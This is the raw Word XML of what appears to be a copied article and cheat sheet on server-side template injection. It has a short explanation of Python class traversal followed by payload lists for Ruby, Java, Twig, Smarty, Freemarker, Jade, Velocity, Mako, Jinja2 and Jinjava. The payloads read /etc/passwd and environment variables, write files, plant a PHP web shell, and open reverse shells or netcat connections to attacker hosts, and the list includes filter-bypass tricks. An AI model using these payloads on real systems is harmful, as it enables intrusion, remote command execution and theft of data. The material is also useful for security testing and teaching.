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420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The MRO in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts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__mro__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 stands for Method Resolution Order, and is defined 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instrText xml:space="preserve"> HYPERLINK "https://docs.python.org/release/2.6.4/library/stdtypes.html" \l "class.__mro__" \t "https://medium.com/server-side-template-injection/_blank" </w:instrTex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t>here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 as, "a tuple of classes that are considered when looking for base classes during method resolution." The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__mro__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 attribute consists of the object's inheritance map in a tuple consisting of the class, its base, its base's base, and so on up to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object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 (if using new-style classes). It is an attribute of each object's metaclass, but is a truly hidden attribute, as Python explicitly leaves it out of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dir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 output (see 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instrText xml:space="preserve"> HYPERLINK "http://hg.python.org/cpython/file/3a1db0d2747e/Objects/object.c" \l "l1812" \t "https://medium.com/server-side-template-injection/_blank" </w:instrTex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t>Objects/object.c at line 1812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) when conducting introspection.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20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The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__subclasses__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 attribute is defined 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instrText xml:space="preserve"> HYPERLINK "https://docs.python.org/release/2.6.4/library/stdtypes.html" \l "class.__subclasses__" \t "https://medium.com/server-side-template-injection/_blank" </w:instrTex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t>here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 as a method that "keeps a list of weak references to its immediate subclasses." for each new-style class, and "returns a list of all those references still alive."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20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Greatly simplified,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__mro__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 allows us to go back up the tree of inherited objects in the current Python environment, and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__subclasses__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 lets us come back down. So what's the impact on the search of a greater exploit for SSTI in Flask/Jinja2? By starting with a new-type object, e.g. type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str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, we can crawl up the inheritance tree to the root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object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 class using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__mro__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, then crawl back down to every new-style object in the Python environment using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__subclasses__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. Yes, this gives us access to every class loaded in the current python environment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20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The first thing we want to do is select a new-style object to use for accessing the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object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 base class. We can simply use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''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, a blank string, object type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str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. Then, we can use the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__mro__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 attribute to access the object's inherited classes. Inject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{{ ''.__class__.__mro__ }}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 as a payload into the SSTI vulnerability. Since we want to go back to the root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object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 class, we'll leverage an index of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2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 to select the class type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object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. Now that we're at the root object, we can leverage the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__subclasses__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 attribute to dump all of the classes used in the application. Inject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{{ ''.__class__.__mro__[2].__subclasses__() }}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 into the SSTI vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:afterAutospacing="1" w:line="320" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i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/>
          <w:caps w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>‘’.__class__.__mro__[2].__subclasses__()[40](‘/etc/passwd’).read() }}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20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Note: Subclass 40 is to read a file.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667500" cy="7905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/etc/passwd file content displayed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Ruby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Basic injection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&lt;%= 7 * 7 %&gt;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Retrieve /etc/passwd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&lt;%= File.open('/etc/passwd').read %&gt;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List files and directories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&lt;%= Dir.entries('/') %&gt;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Java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Basic injection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${7*7}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${{7*7}}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${class.getClassLoader()}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${class.getResource("").getPath()}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${class.getResource("../../../../../index.htm").getContent()}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Retrieve the system’s environment variables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${T(java.lang.System).getenv()}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Retrieve /etc/passwd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${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())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Twig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Basic injection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{{7*7}}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{{7*'7'}} would result in 49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659" w:beforeAutospacing="0" w:line="28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2"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Template format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$output = $twig &gt; render (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 xml:space="preserve">  'Dear' . $_GET['custom_greeting'],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 xml:space="preserve">  array("first_name" =&gt; $user.first_name)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);$output = $twig &gt; render (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 xml:space="preserve">  "Dear {first_name}",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 xml:space="preserve">  array("first_name" =&gt; $user.first_name)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Code execution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{{self}}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{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}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{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}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Smarty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{php}echo `id`;{/php}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{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"&lt;?php passthru($_GET['cmd']); ?&gt;",self::clearConfig())}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Freemarker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You can try your payloads at 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instrText xml:space="preserve"> HYPERLINK "https://try.freemarker.apache.org/" \t "https://medium.com/server-side-template-injection/_blank" </w:instrTex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t>https://try.freemarker.apache.org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Basic injection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The template can be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${3*3}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 or the legacy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#{3*3}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Code execution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&lt;#assign ex = "freemarker.template.utility.Execute"?new()&gt;${ ex("id")}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[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}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${"freemarker.template.utility.Execute"?new()("id")}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Jade / Codepen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- var x = root.process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- x = x.mainModule.require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- x = x('child_process')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= x.exec('id | nc attacker.net 80')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Velocity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#set($str=$class.inspect("java.lang.String").type)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#set($chr=$class.inspect("java.lang.Character").type)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#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))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$ex.waitFor()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#set($out=$ex.getInputStream())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#foreach($i in [1..$out.available()])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$str.valueOf($chr.toChars($out.read()))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#end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Mako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&lt;%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import os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x=os.popen('id').read()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%&gt;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${x}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Jinja2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instrText xml:space="preserve"> HYPERLINK "http://jinja.pocoo.org/" \t "https://medium.com/server-side-template-injection/_blank" </w:instrTex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t>Official website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420" w:beforeAutospacing="0" w:afterAutospacing="1" w:line="320" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/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Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.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Basic injection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{{4*4}}[[5*5]]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{{7*'7'}} would result in 7777777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{{config.items()}}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20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Jinja2 is used by Python Web Frameworks such as Django or Flask. The above injections have been tested on Flask application.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Template format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{% extends "layout.html" %}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{% block body %}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 xml:space="preserve">  &lt;ul&gt;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 xml:space="preserve">  {% for user in users %}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 xml:space="preserve">    &lt;li&gt;&lt;a href="{{ user.url }}"&gt;{{ user.username }}&lt;/a&gt;&lt;/li&gt;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 xml:space="preserve">  {% endfor %}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 xml:space="preserve">  &lt;/ul&gt;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{% endblock %}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Dump all used classes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 [].class.base.subclasses() }}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{{''.class.mro()[1].subclasses()}}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 ''.__class__.__mro__[2].__subclasses__() }}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Dump all config variables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{% for key, value in config.iteritems() %}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 xml:space="preserve">    &lt;dt&gt;{{ key|e }}&lt;/dt&gt;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 xml:space="preserve">    &lt;dd&gt;{{ value|e }}&lt;/dd&gt;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{% endfor %}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Read remote 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# ''.__class__.__mro__[2].__subclasses__()[40] = File class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 ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}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 config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}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Write into remote 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 ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}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Remote Code Execution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Listen for connection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nv -lnvp 8000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Exploit the SSTI by calling subprocess.Popen.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⚠️ the number 396 will vary depending of the application.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{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}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Exploit the SSTI by calling Popen without guessing the offset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{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\" \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}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Exploit the SSTI by writing an evil config file.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# evil config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 ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # load the evil config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 config.from_pyfile('/tmp/evilconfig.cfg') }}  # connect to evil host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 config['RUNCMD']('/bin/bash -c "/bin/bash -i &gt;&amp; /dev/tcp/x.x.x.x/8000 0&gt;&amp;1"',shell=True) }}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Filter bypass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request.__class__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request["__class__"]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20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Bypassing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_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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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instrText xml:space="preserve"> HYPERLINK "http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&amp;class=class&amp;usc=_" \t "https://medium.com/server-side-template-injection/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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t>http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&amp;class=class&amp;usc=_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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end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{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}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{{request|attr(["_"*2,"class","_"*2]|join)}}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{{request|attr(["__","class","__"]|join)}}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{{request|attr("__class__")}}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{{request.__class__}}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20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Bypassing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[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 and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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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instrText xml:space="preserve"> HYPERLINK "http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&amp;class=class&amp;usc=_" \t "https://medium.com/server-side-template-injection/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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t>http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&amp;class=class&amp;usc=_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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end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or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http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&amp;l=a&amp;a=_&amp;a=_&amp;a=class&amp;a=_&amp;a=_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20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Bypassing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|join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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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instrText xml:space="preserve"> HYPERLINK "http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&amp;f=%s%sclass%s%s&amp;a=_" \t "https://medium.com/server-side-template-injection/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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t>http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&amp;f=%s%sclass%s%s&amp;a=_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i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Jinjava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Basic injection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{{'a'.toUpperCase()}} would result in 'A'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 request }} would return a request object like com.[...].context.TemplateContextRequest@23548206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20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Jinjava is an open source project developped by Hubspot, available at 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instrText xml:space="preserve"> HYPERLINK "https://github.com/HubSpot/jinjava/" \t "https://medium.com/server-side-template-injection/_blank" </w:instrTex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t>https://github.com/HubSpot/jinjava/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92929"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Command execution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0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Fixed by 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instrText xml:space="preserve"> HYPERLINK "https://github.com/HubSpot/jinjava/pull/230" \t "https://medium.com/server-side-template-injection/_blank" </w:instrTex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t>https://github.com/HubSpot/jinjava/pull/230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{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}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16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}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678FD"/>
    <w:rsid w:val="4316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7">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:r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2022-12-01T02:45:00Z</dcterms:created>
  <dc:creator>PANNA LAL GUPTA</dc:creator>
  <cp:lastModifiedBy>WPS_1665655857</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-01T02:45:57Z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